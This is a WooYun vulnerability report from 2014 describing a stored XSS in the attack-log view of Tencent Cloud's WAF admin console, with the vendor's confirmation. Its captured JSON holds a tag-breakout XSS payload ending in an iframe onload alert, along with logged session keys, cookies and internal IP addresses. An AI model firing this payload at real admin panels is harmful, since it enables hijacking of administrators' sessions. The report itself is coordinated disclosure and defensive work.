当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088723

漏洞标题:腾讯云WAF安全防护存在一处XSS

相关厂商:腾讯

漏洞作者: bingfeng

提交时间:2014-12-26 10:20

修复时间:2015-02-09 10:22

公开时间:2015-02-09 10:22

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:2

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-26: 细节已通知厂商并且等待厂商处理中
2014-12-26: 厂商已经确认,细节仅向厂商公开
2015-01-05: 细节向核心白帽子及相关领域专家公开
2015-01-15: 细节向普通白帽子公开
2015-01-25: 细节向实习白帽子公开
2015-02-09: 细节向公众公开

简要描述:

攻击者通过攻击对方所在的腾讯云服务,可以在提交数据中构造XSS,当网站管理员登陆腾讯云后台,查看攻击攻击详情时可看到xss攻击效果

详细说明:

攻击者通过攻击对方所在的腾讯云服务,可以在提交数据中构造XSS,当网站管理员登陆腾讯云后台,查看攻击攻击详情时可看到xss攻击效果.
攻击者构造iframe可实现自动加载xss代码,弹出提示

漏洞证明:

1.png


2.png


3.jpg


返回的请求json数据如下

{"result":"ok","data":{"req_detail":"GET \/.svn\/entries HTTP\/1.1<br\/>Host: 182.254.143.151<br\/>Accept: *\/*<br\/>Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7<br\/>Accept-Language: zh-cn, zh<br\/>User-Agent: Mozilla\/4.0<br\/>Connection: close<br\/><br\/>68D064E9E569B3090E7A92EDC80A7D02603601F56C0953CFE7534B85B4686AB21B263AEF41F507757D0846624D5F69450C3F8D58D2D60AF3564A8E15D1CE4636E5CC6175CD3963C52764169F0533E3D0D87B56A1560951640D9F77D62805834B288EBAFE5E2E04F7BC6A22D0F745EDCDA2AB525E7D93874175930FC1D6500E842CD5A45EE78EF6CC1AB3F501BD879C2DB7EF2CBC7DFF7CEFE806F75D63FD08E73FFA1BE3A0C5BD1044D85E715698A61B63CE5DFDCFEB66&loginParam=1'%22%3E%3C\/title%3E%3C\/textarea%3E%3C\/xmp%3E%3C\/iframe%3E%3C\/noscript%3E%3C\/noframes%3E%3C\/plaintext%3E%3C\/form%3E%3C\/script%3E%3Ciframe\/onload=alert(\/xss\/)%3E%3C\/iframe%3E&length=34&lengh=34&sessionKey=AA1755F84BAD99468EA5381258B1A0E7BD29A12F43E09C7CDB485F8251CF357C927A0C86FE9BC128085A7B44CE8385B87AC635EF135CB51A9068D064E9E569B3090E7A92EDC80A7D02603601F56C0953CFE7534B85B4686A59956FDDAD518EB2 HTTP\/1.0<br\/>Host:panshi.isd.com<br\/>X-Real-IP:10.166.4.166<br\/>X-Forwarded-For:10.166.4.166<br\/>Connection:close<br\/>Tencent-LeakScan:TST(Tencent Security Team)<br\/>Realip:10.137.146.143<br\/>User-Agent:Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/534.34 (KHTML, like Gecko) Qt\/4.8.2 Safari\/534.34<br\/>Accept:text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8<br\/>Cookie:ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2205bf5807aa6190c6095029ca9dac8327%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2210.204.135.40%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A93%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%29+AppleWebKit%2F534.34+%28KHTML%2C+like+Gecko%29+Qt%2F4.8.2+Safari%2F534.34%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1419461604%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D01b3e25a0ffeacd88fadeb21a10fa76a; PHPSESSID=19spr7fif2pg7i3o6trpmelng6<br\/>Accept-Encoding:gzip<br\/>Accept-Language:en,*<br\/><br\/>=88&arrs2[]=90&arrs2[]=104&arrs2[]=98&arrs2[]=67&arrs2[]=104&arrs2[]=105&arrs2[]=89&arrs2[]=88&arrs2[]=78&arrs2[]=108&arrs2[]=78&arrs2[]=106&arrs2[]=82&arrs2[]=102&arrs2[]=90&arrs2[]=71&arrs2[]=86&arrs2[]=106&arrs2[]=98&arrs2[]=50&arrs2[]=82&arrs2[]=108&arrs2[]=75&arrs2[]=67&arrs2[]=82&arrs2[]=102&arrs2[]=85&arrs2[]=107&arrs2[]=86&arrs2[]=82&arrs2[]=86&arrs2[]=85&arrs2[]=86&arrs2[]=84&arrs2[]=86&arrs2[]=70&arrs2[]=116&arrs2[]=54&arrs2[]=77&arrs2[]=70&arrs2[]=48&arrs2[]=112&arrs2[]=75&arrs2[]=81&arrs2[]=61&arrs2[]=61&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=44&arrs2[]=48&arrs2[]=41&arrs2[]=59&arrs2[]=125&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=0 HTTP\/1.1<br\/>Accept: *\/*<br\/>Accept-Language: zh-cn<br\/>User-Agent: Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident\/5.0)<br\/>Host: zhuyi.cn<br\/><br\/>%B5%AA%E7%9A%84%E7%AC%AC%E5%8D%81%E4%B8%89%E7%AB%A0%E5%88%B0%E5%8D%81%E4%BA%94%E7%AB%A0%E8%A7%81%E5%8D%8E.html'%20target=_blank%3E%E6%9F%A5%E7%9C%8B%E5%85%A8%E6%96%87%3C\/a%3E%3Cbr%3E2014-02-01%3C\/h4%3E%3Cbr%20\/%3E%3Cbr%20\/%3E%3Ch3%20class='B%20U'%3E%E3%80%90%E4%BA%BA%E5%A6%BB%E5%91%A8%E5%80%A9%E7%9A%84%E6%B2%89%E6%B2%A6%E3%80%91%E7%AC%AC%E5%9B%9B%E7%AB%A0%E3%80%81%E6%B2%89%E6%B2%A6%E4%B8%8E%E6%8A%97%E4%BA%89(%E4%B8%87%E5%AD%97%E6%9B%B4%E6%96%B0)5200%7C%E3%80%90%E4%BA%BA%E5%A6%BB%E5%91%A8%E3%80%82%E3%80%82%E3%80%82%3C\/h3%3E%E5%B0%8F%E8%AF%B4%E4%B9%A6%E5%90%8D:%E3%80%90%E4%BA%BA%E5%A6%BB%E5%91%A8%E5%80%A9%E7%9A%84%E6%B2%89%E6%B2%A6%E3%80%91%E7%AC%AC%E5%9B%9B%E7%AB%A0%E3%80%81%E6%B2%89%E6%B2%A6%E4%B8%8E%E6%8A%97%E4%BA%89(%E4%B8%87%E5%AD%97%E6%9B%B4%E6%96%B0)%20%E8%83%8C%E6%99%AF%E9%A2%9C%E8%89%B2:%20%E5%AD%97%E4%BD%93%E9%A2%9C%E8%89%B2%E3%80%82%E3%80%82%E3%80%82%20%E6%98%AF%E4%B8%80%E9%83%A8%E4%BC%98%E7%A7%80%E7%9A%84%E7%BA%A2%E7%81%AF%E6%BF%80%E6%83%85%E5%8C%BA%E5%B0%8F%E8%AF%B4%E3%80%82%E4%BC%9A%E5%91%98%E8%BD%AC%E8%BD%BD%E5%8F%AA%E6%98%AF%E4%B8%BA%E4%BA%86%E5%AE%A3%E4%BC%A0%E6%9C%AC%E4%B9%A6%E8%AE%A9%E6%9B%B4%E5%A4%9A%E8%AF%BB%E8%80%85%E5%88%86%E4%BA%AB,%E5%A6%82%E6%9E%9C%E4%BD%9C%E8%80%85%E4%B8%8D%E3%80%82%E3%80%82%E3%80%82%3Cbr%20\/%3E%3Cbr%20\/%3E%3Ch4%20class='FloatRight%20TextRight'%3E%3Ca%20href='detail%E3%80%90%E4%BA%BA%E5%A6%BB%E5%91%A8%E5%80%A9%E7%9A%84%E6%B2%89%E6%B2%A6%E3%80%91%E7%AC%AC%E5%9B%9B%E7%AB%A0%E3%80%81%E6%B2%89%E6%B2%A6%E4%B8%8E%E6%8A%97%E4%BA%89%E4%B8%87%E5%AD%97%E6%9B%B4%E6%96%B05200%E3%80%90%E4%BA%BA%E5%A6%BB%E5%91%A8.html'%20target=_blank%3E%E6%9F%A5%E7%9C%8B%E5%85%A8%E6%96%87%3C\/a%3E%3Cbr%3E2014-02-06%3C\/h4%3E%3Cbr%20\/%3E%3Cbr%20\/%3E%3C\/div%3E%3Cbr%20\/%3E%3Cscript%20type= HTTP\/1.0<br\/>User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/536.11 (KHTML, like Gecko) Chrome\/20.0.1132.57 Safari\/536.11<br\/>Accept: *\/*<br\/>Referer: http:\/\/www.jiajiao-edu.com\/news\/det%E4%BA%BA%E5%A6%BB%E5%91%A8%E5%80%A9%E7%9A%84%E6%B2%89%E6%B2%A6115%E7%AB%A0%E5%A4%96%E7%AF%87%E4%BD%9C%E8%80%85%E9%BE%99%E5%B0%8F%E4%BE%A0txt%E9%A6%99%E8%89%B3%E5%B0%8F%E8%AF%B4%E6%A2%A6%E7%8E%8B%E6%9C%9D-1-20.html<br\/>Cookie: safedog-flow-item=F844E7985FAE873AA5FB0C5917F2DB99<br\/>Accept-Encoding: gzip<br\/>Accept-Language: en-US,*<br\/>Host: www.jiajiao-edu.com<br\/>Cache-Control: max-age=259200<br\/>Connection: keep-alive<br\/><br\/>1044D85E715698A61B63CE5DFDCFEB66&loginParam=1'\"><\/title><\/textarea><\/xmp><\/iframe><\/noscript><\/noframes><\/plaintext><\/form><\/script><iframe\/onload=alert(\/xss\/)><\/iframe>&length=34&lengh=34&sessionKey=AA1755F84BAD99468EA5381258B1A0E7BD29A12F43E09C7CDB485F8251CF357C927A0C86FE9BC128085A7B44CE8385B87AC635EF135CB51A9068D064E9E569B3090E7A92EDC80A7D02603601F56C0953CFE7534B85B4686A59956FDDAD518EB2"}}


由于当天的测试数据第二天才能在后台显示,所以未进入深入测试.

修复方案:

转义html标签

版权声明:转载请注明来源 bingfeng@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-12-26 11:21

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无